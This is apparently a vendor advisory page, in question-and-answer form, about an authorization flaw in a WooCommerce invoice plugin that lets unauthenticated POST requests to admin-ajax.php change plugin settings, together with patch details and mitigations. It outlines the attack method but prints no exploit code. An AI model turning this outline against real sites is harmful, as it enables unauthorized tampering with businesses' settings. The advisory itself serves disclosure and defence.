The vulnerability allows attackers to send a POST request to the WordPress admin-ajax.php endpoint with the appropriate action parameter, triggering the plugin’s update function without proper permission checks. This can lead to unauthorized changes to plugin settings and configurations.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Print Invoice & Delivery Notes for WooCommerce plugin version 5.8.0 or earlier is affected. Administrators should check their plugin version and update if necessary to mitigate the risk.
How can I check if my site is vulnerable?
Steps to verify plugin version
To check if your site is vulnerable, log in to your WordPress admin dashboard, navigate to the Plugins section, and look for the Print Invoice & Delivery Notes plugin. If the version is 5.8.0 or lower, your site is vulnerable.
How can I fix or mitigate this issue?
Recommended actions
To fix the vulnerability, update the Print Invoice & Delivery Notes for WooCommerce plugin to version 5.9.0 or later, where the issue has been patched. Regularly updating plugins is essential for maintaining site security.
What does the CVSS score of 5.3 indicate?
Understanding risk levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability does not allow for direct code execution or data exfiltration, it can still lead to significant unauthorized changes that could disrupt business operations.
What are the potential risks of exploitation?
Consequences of unauthorized access
If exploited, this vulnerability allows attackers to modify plugin settings, which could change invoice formats or company information displayed on documents. This may disrupt business operations and affect customer trust.
What is a proof of concept?
Demonstration of the vulnerability
A proof of concept (PoC) is a demonstration that illustrates how the vulnerability can be exploited. In this case, the PoC shows how to send a crafted HTTP request to trigger the vulnerable update function without authentication.
What security measures were added in the patch?
Improvements in the updated version
The patch for version 5.9.0 includes checks to ensure the request originates from the admin area, verifies the user has the ‘manage_options’ capability, and validates a nonce token to prevent unauthorized access.
How can I stay informed about vulnerabilities?
Best practices for security awareness
To stay informed, regularly follow security advisories from WordPress and plugin developers, subscribe to security mailing lists, and consider using security plugins that monitor vulnerabilities and provide alerts.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If an immediate update is not possible, consider disabling the plugin until it can be updated to prevent potential exploitation. Additionally, review your site’s access controls and consider implementing additional security measures.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-24946 can be found on the official CVE database, security blogs, and the plugin’s repository on WordPress.org, where you can also find details about the patch and updates.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations